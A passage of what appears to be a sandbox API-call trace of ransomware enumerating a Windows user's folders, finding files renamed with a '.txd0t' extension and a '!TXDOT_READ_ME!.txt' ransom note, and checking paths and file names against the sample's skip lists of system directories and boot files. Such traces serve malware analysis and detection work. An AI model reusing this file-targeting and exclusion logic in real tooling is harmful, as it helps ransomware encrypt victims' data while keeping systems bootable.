PathFindExtensionW (pszPath="UFfU-NQWoB7XyHy.mp3.txd0t") returned=".txd0t" [0129.175] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.175] StrCmpW (psz1="wL6CtWVaL-45s.odp.txd0t", psz2=".") returned 1 [0129.175] StrCmpW (psz1="wL6CtWVaL-45s.odp.txd0t", psz2="..") returned 1 [0129.175] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0129.175] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0129.175] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="wL6CtWVaL-45s.odp.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\wL6CtWVaL-45s.odp.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\wL6CtWVaL-45s.odp.txd0t" [0129.175] PathFindExtensionW (pszPath="wL6CtWVaL-45s.odp.txd0t") returned=".txd0t" [0129.175] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.176] StrCmpW (psz1="XqhhUYjJL0U.rtf.txd0t", psz2=".") returned 1 [0129.176] StrCmpW (psz1="XqhhUYjJL0U.rtf.txd0t", psz2="..") returned 1 [0129.176] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0129.176] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0129.176] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="XqhhUYjJL0U.rtf.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\XqhhUYjJL0U.rtf.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\XqhhUYjJL0U.rtf.txd0t" [0129.176] PathFindExtensionW (pszPath="XqhhUYjJL0U.rtf.txd0t") returned=".txd0t" [0129.176] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.176] StrCmpW (psz1="YDXeffFC99vGn.mp3.txd0t", psz2=".") returned 1 [0129.176] StrCmpW (psz1="YDXeffFC99vGn.mp3.txd0t", psz2="..") returned 1 [0129.176] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0129.176] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0129.176] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="YDXeffFC99vGn.mp3.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\YDXeffFC99vGn.mp3.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\YDXeffFC99vGn.mp3.txd0t" [0129.176] PathFindExtensionW (pszPath="YDXeffFC99vGn.mp3.txd0t") returned=".txd0t" [0129.176] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.176] StrCmpW (psz1="Yjcpzl.ppt.txd0t", psz2=".") returned 1 [0129.176] StrCmpW (psz1="Yjcpzl.ppt.txd0t", psz2="..") returned 1 [0129.176] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0129.176] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0129.176] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="Yjcpzl.ppt.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Yjcpzl.ppt.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Yjcpzl.ppt.txd0t" [0129.176] PathFindExtensionW (pszPath="Yjcpzl.ppt.txd0t") returned=".txd0t" [0129.176] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.176] StrCmpW (psz1="_ZxYRX.rtf.txd0t", psz2=".") returned 1 [0129.176] StrCmpW (psz1="_ZxYRX.rtf.txd0t", psz2="..") returned 1 [0129.176] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0129.176] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0129.176] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="_ZxYRX.rtf.txd0t", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\_ZxYRX.rtf.txd0t") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\_ZxYRX.rtf.txd0t" [0129.176] PathFindExtensionW (pszPath="_ZxYRX.rtf.txd0t") returned=".txd0t" [0129.176] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.177] StrCmpW (psz1="Application Data", psz2=".") returned 1 [0129.177] StrCmpW (psz1="Application Data", psz2="..") returned 1 [0129.177] StrCmpW (psz1="Contacts", psz2=".") returned 1 [0129.177] StrCmpW (psz1="Contacts", psz2="..") returned 1 [0129.177] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0129.177] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0129.177] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="Contacts", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\Contacts") returned="C:\\Users\\FD1HVy\\Contacts" [0129.177] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="\\windows\\system32\\") returned 0x0 [0129.177] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.177] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="\\windows\\system\\") returned 0x0 [0129.177] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.177] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.177] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="\\appdata\\local\\") returned 0x0 [0129.177] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="\\appdata\\locallow\\") returned 0x0 [0129.177] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="\\all users\\microsoft\\") returned 0x0 [0129.177] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="\\inetpub\\logs\\") returned 0x0 [0129.177] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch=":\\boot\\") returned 0x0 [0129.177] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch=":\\perflogs\\") returned 0x0 [0129.177] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch=":\\programdata\\") returned 0x0 [0129.177] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch=":\\drivers\\") returned 0x0 [0129.177] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch=":\\wsus\\") returned 0x0 [0129.177] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch=":\\efstmpwp\\") returned 0x0 [0129.177] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch=":\\$recycle.bin\\") returned 0x0 [0129.177] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="crypt_detect") returned 0x0 [0129.177] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="cryptolocker") returned 0x0 [0129.177] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="ransomware") returned 0x0 [0129.177] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="C:\\WINDOWS") returned 0x0 [0129.177] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="C:\\Program Files (x86)") returned 0x0 [0129.177] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Contacts", lpSrch="C:\\Program Files") returned 0x0 [0129.178] GetProcessHeap () returned 0xe30000 [0129.178] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b2) returned 0xed39f8 [0129.178] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Contacts", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Contacts") returned="C:\\Users\\FD1HVy\\Contacts" [0129.178] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Contacts", psz2="\\*", cchMax=1074 | out: psz1="C:\\Users\\FD1HVy\\Contacts\\*") returned="C:\\Users\\FD1HVy\\Contacts\\*" [0129.178] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Contacts\\*", lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd43ecce6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xce2cb2cd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23b0 [0129.178] StrCmpW (psz1=".", psz2=".") returned 0 [0129.178] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd43ecce6, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xce2cb2cd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.178] StrCmpW (psz1="..", psz2=".") returned 1 [0129.178] StrCmpW (psz1="..", psz2="..") returned 0 [0129.178] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0129.178] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0129.178] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0129.178] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce2f1526, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x740e99, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0129.178] FindClose (in: hFindFile=0xec23b0 | out: hFindFile=0xec23b0) returned 1 [0129.178] GetProcessHeap () returned 0xe30000 [0129.178] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed39f8 | out: hHeap=0xe30000) returned 1 [0129.178] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0129.179] StrCmpW (psz1="Cookies", psz2=".") returned 1 [0129.179] StrCmpW (psz1="Cookies", psz2="..") returned 1 [0129.179] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x513589b8, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x513589b8, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0129.179] StrCmpW (psz1="Desktop", psz2=".") returned 1 [0129.179] StrCmpW (psz1="Desktop", psz2="..") returned 1 [0129.179] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0129.179] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0129.179] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="Desktop", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0129.179] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="\\windows\\system32\\") returned 0x0 [0129.179] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.179] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="\\windows\\system\\") returned 0x0 [0129.179] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.179] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.179] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="\\appdata\\local\\") returned 0x0 [0129.179] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="\\appdata\\locallow\\") returned 0x0 [0129.179] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="\\all users\\microsoft\\") returned 0x0 [0129.179] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="\\inetpub\\logs\\") returned 0x0 [0129.179] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch=":\\boot\\") returned 0x0 [0129.179] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch=":\\perflogs\\") returned 0x0 [0129.179] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch=":\\programdata\\") returned 0x0 [0129.179] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch=":\\drivers\\") returned 0x0 [0129.179] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch=":\\wsus\\") returned 0x0 [0129.179] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch=":\\efstmpwp\\") returned 0x0 [0129.179] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch=":\\$recycle.bin\\") returned 0x0 [0129.179] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="crypt_detect") returned 0x0 [0129.179] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="cryptolocker") returned 0x0 [0129.180] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="ransomware") returned 0x0 [0129.180] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="C:\\WINDOWS") returned 0x0 [0129.180] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="C:\\Program Files (x86)") returned 0x0 [0129.180] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Desktop", lpSrch="C:\\Program Files") returned 0x0 [0129.180] GetProcessHeap () returned 0xe30000 [0129.180] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b0) returned 0xed39f8 [0129.180] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0129.180] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\*", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\*") returned="C:\\Users\\FD1HVy\\Desktop\\*" [0129.180] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\*", lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x513589b8, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x513589b8, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23b0 [0129.180] StrCmpW (psz1=".", psz2=".") returned 0 [0129.180] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x513589b8, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x513589b8, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.180] StrCmpW (psz1="..", psz2=".") returned 1 [0129.180] StrCmpW (psz1="..", psz2="..") returned 0 [0129.180] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x506ae2a3, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x506ae2a3, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x506ae2a3, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0129.180] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0129.180] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0129.180] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0129.180] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0129.180] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Desktop\\!TXDOT_READ_ME!.txt" [0129.180] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0129.180] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0129.180] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0129.180] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0129.180] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0129.180] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0129.180] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0129.180] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0129.180] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0129.180] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0129.181] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0129.181] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0129.181] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0129.181] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0129.181] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0129.181] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0129.181] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5eb7b760, ftCreationTime.dwHighDateTime=0x1d5e678, ftLastAccessTime.dwLowDateTime=0x73a94270, ftLastAccessTime.dwHighDateTime=0x1d5e5c8, ftLastWriteTime.dwLowDateTime=0x506ae2a3, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x137f2, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="3475V2DB.pdf.txd0t", cAlternateFileName="3475V2~1.TXD")) returned 1 [0129.181] StrCmpW (psz1="3475V2DB.pdf.txd0t", psz2=".") returned 1 [0129.181] StrCmpW (psz1="3475V2DB.pdf.txd0t", psz2="..") returned 1 [0129.181] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0129.181] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0129.181] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="3475V2DB.pdf.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\3475V2DB.pdf.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\3475V2DB.pdf.txd0t" [0129.181] PathFindExtensionW (pszPath="3475V2DB.pdf.txd0t") returned=".txd0t" [0129.181] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.181] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x355c0030, ftCreationTime.dwHighDateTime=0x1d5e176, ftLastAccessTime.dwLowDateTime=0xab01ed50, ftLastAccessTime.dwHighDateTime=0x1d5e193, ftLastWriteTime.dwLowDateTime=0x506d4431, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11b34, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="5dJ40KpaZH5gABK Wvl.xls.txd0t", cAlternateFileName="5DJ40K~1.TXD")) returned 1 [0129.181] StrCmpW (psz1="5dJ40KpaZH5gABK Wvl.xls.txd0t", psz2=".") returned 1 [0129.181] StrCmpW (psz1="5dJ40KpaZH5gABK Wvl.xls.txd0t", psz2="..") returned 1 [0129.181] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0129.181] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0129.181] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="5dJ40KpaZH5gABK Wvl.xls.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\5dJ40KpaZH5gABK Wvl.xls.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\5dJ40KpaZH5gABK Wvl.xls.txd0t" [0129.181] PathFindExtensionW (pszPath="5dJ40KpaZH5gABK Wvl.xls.txd0t") returned=".txd0t" [0129.181] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.181] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26738d40, ftCreationTime.dwHighDateTime=0x1d5eddd, ftLastAccessTime.dwLowDateTime=0x866074e0, ftLastAccessTime.dwHighDateTime=0x1d5e9ad, ftLastWriteTime.dwLowDateTime=0x506fa698, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11d96, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="5WpFV5we BjOWCFQ_8P.png.txd0t", cAlternateFileName="5WPFV5~1.TXD")) returned 1 [0129.181] StrCmpW (psz1="5WpFV5we BjOWCFQ_8P.png.txd0t", psz2=".") returned 1 [0129.181] StrCmpW (psz1="5WpFV5we BjOWCFQ_8P.png.txd0t", psz2="..") returned 1 [0129.181] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0129.181] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0129.181] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="5WpFV5we BjOWCFQ_8P.png.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\5WpFV5we BjOWCFQ_8P.png.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\5WpFV5we BjOWCFQ_8P.png.txd0t" [0129.181] PathFindExtensionW (pszPath="5WpFV5we BjOWCFQ_8P.png.txd0t") returned=".txd0t" [0129.181] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.181] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376e3d90, ftCreationTime.dwHighDateTime=0x1d5e688, ftLastAccessTime.dwLowDateTime=0x485dd3a0, ftLastAccessTime.dwHighDateTime=0x1d5e24f, ftLastWriteTime.dwLowDateTime=0x506fa698, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x49f1, 